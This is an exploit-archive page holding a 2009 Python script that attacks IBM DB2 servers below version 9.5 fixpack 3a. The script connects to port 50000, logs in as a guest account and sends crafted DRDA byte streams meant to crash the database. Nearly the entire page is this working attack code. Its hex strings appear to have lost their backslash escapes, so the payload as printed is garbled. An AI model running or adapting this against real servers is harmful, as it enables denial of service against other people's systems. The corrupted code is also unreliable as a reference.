[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IBM DB2 < 9.5 pack 3a Malicious Data Stream Denial of Service Exploit
# Published : 2009-04-03
# Author : Dennis Yurichev
# Previous Title : IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit
# Next Title : DeepBurner 1.9.0.228 Stack Buffer Overflow (SEH) PoC
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
# GUEST account with QQ password shoule be present on target system
from sys import *
from socket import *
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000))
sockobj.send(
"x00xBExD0x41x00x01x00xB8x10x41x00x7Fx11x5Ex97xA8"
"xA3x88x96x95x4Bx85xA7x85x40x40x40x40x40x40x40x40"
"x40x40xF0xF1xC2xF4xF0xF3xC2xF8xF0xF0xF0x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x60xF0xF0"
"xF0xF1xD5xC1xD4xC5x40x40x40x40x40x40x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40"
"xC4xC2xF2xE3xC5xE2xE3x40xF0xC4xC2xF2x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x00x18x14x04x14x03x00"
"x07x24x07x00x09x14x74x00x05x24x0Fx00x08x14x40x00"
"x08x00x0Bx11x47xD8xC4xC2xF2x61xD5xE3x00x06x11x6D"
"xE7xD7x00x0Cx11x5AxE2xD8xD3xF0xF9xF0xF5xF0x00x4A"
"xD0x01x00x02x00x44x10x6Dx00x06x11xA2x00x09x00x16"
"x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
"x40x40x40x40x00x24x11xDCx71x71x99xA7xDFxD5x8Fx18"
"x45x96xD6x07x08x8DxDCx60x4FxFAxE6x37x4Dx6Ax62xAB"
"x0CxE1x00xABxA3xD5x32x3E"
)
data=sockobj.recv(102400)
sockobj.send(
"x00x26xD0x41x00x01x00x20x10x6Dx00x06x11xA2x00x03"
"x00x16x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40"
"x40x40x40x40x40x40x00x35xD0x41x00x02x00x2Fx10x6E"
"x00x06x11xA2x00x03x00x16x21x10xC4xC2xF2xE3xC5xE2"
"xE3x40x40x40x40x40x40x40x40x40x40x40x00x06x11xA1"
"x98x98x00x09x11xA0x87xA4x85xA2xA3x00xBFxD0x01x00"
"x03x00xB9x20x01x00x06x21x0Fx24x07x00x23x21x35xF1"
"xF9xF2x4BxF1xF6xF8x4BxF0x4BxF1xF0xF8x4BxF3xF5xF3"
"xF3xF3x4BxF0xF8xF1xF0xF2xF3xF1xF6xF0xF8xF1x00x16"
"x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
"x40x40x40x40x00x0Cx11x2ExE2xD8xD3xF0xF9xF0xF5xF0"
"x00x0Dx00x2FxD8xE3xC4xE2xD8xD3xE7xF8xF6x00x1Cx00"
"x35x00x06x11x9Cx04xE4x00x06x11x9Dx04xB0x00x06x11"
"x9Ex04xE4x00x06x19x13x04xB8x00x3Cx21x04x37xE2xD8"
"xD3xF0xF9xF0xF5xF0xD5xE3x40x40x40x40x40x40x40x40"
"x40x40x40x40x40x40x40x40x97xA8xA3x88x96x95x4Bx85"
"xA7x85x40x40x40x40x40x40x40x40x40x40x87xA4x85xA2"
"xA3x40x40x40x00x00x05x21x3BxF1"
)
data=sockobj.recv(102400)
sockobj.send(
"x00x12xD0x41x00x01x00x0Cx10x41x00x08x14x04x14xCC"
"x04xE4x00x4ExD0x51x00x02x00x48x20x14x00x44x21x13"
"x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20x20"
"x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20x20"
"x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20x20"
"x20x20x20x20x20x20x01x01x01x01x01x01x01x01x00x01"
"x00x35xD0x74x00x02x00x2Fx24x14x00x00x00x00x25x53"
"x45x54x20x43x55x52x52x45x4Ex54x20x4Cx4Fx43x41x4C"
"x45x20x4Cx43x5Fx43x54x59x50x45x20x3Dx20x27x65x6E"
"x5Fx55x53x27xFFx00x53xD0x51x00x03x00x4Dx20x0Dx00"
"x44x21x13x44x42x32x54x45x53x54x20x20x20x20x20x20"
"x20x20x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20"
"x20x20x20x20x20x20x20x53x59x53x53x48x32x30x30x20"
"x20x20x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30"
"x31x00x04x00x05x21x16xF1x00x1AxD0x53x00x03x00x14"
"x24x50x00x00x00x00x0Ax57x49x54x48x20x48x4Fx4Cx44"
"x20xFFx00x41xD0x43x00x03x00x3Bx24x14x00x00x00x00"
"x31x73x65x6Cx65x63x74x20x2Ax20x46x52x4Fx4Dx20x54"
"x41x42x4Cx45x20x28x73x79x73x70x72x6Fx63x2Ex65x6E"
"x76x5Fx67x65x74x5Fx69x6Ex73x74x5Fx69x6Ex66x6Fx28"
"x29x29xFFx00x66xD0x01x00x04x00x60x20x0Cx00x44x21"
"x13x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20"
"x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20"
"x20x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20"
"x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30x31x00"
"x04x00x08x21x14x00x00x7FxFFx00x06x21x41xFFxFFx00"
"x05x21x5Dx01x00x05x21x4BxF1"
)
sockobj.close()
# www.Syue.com [2009-04-03]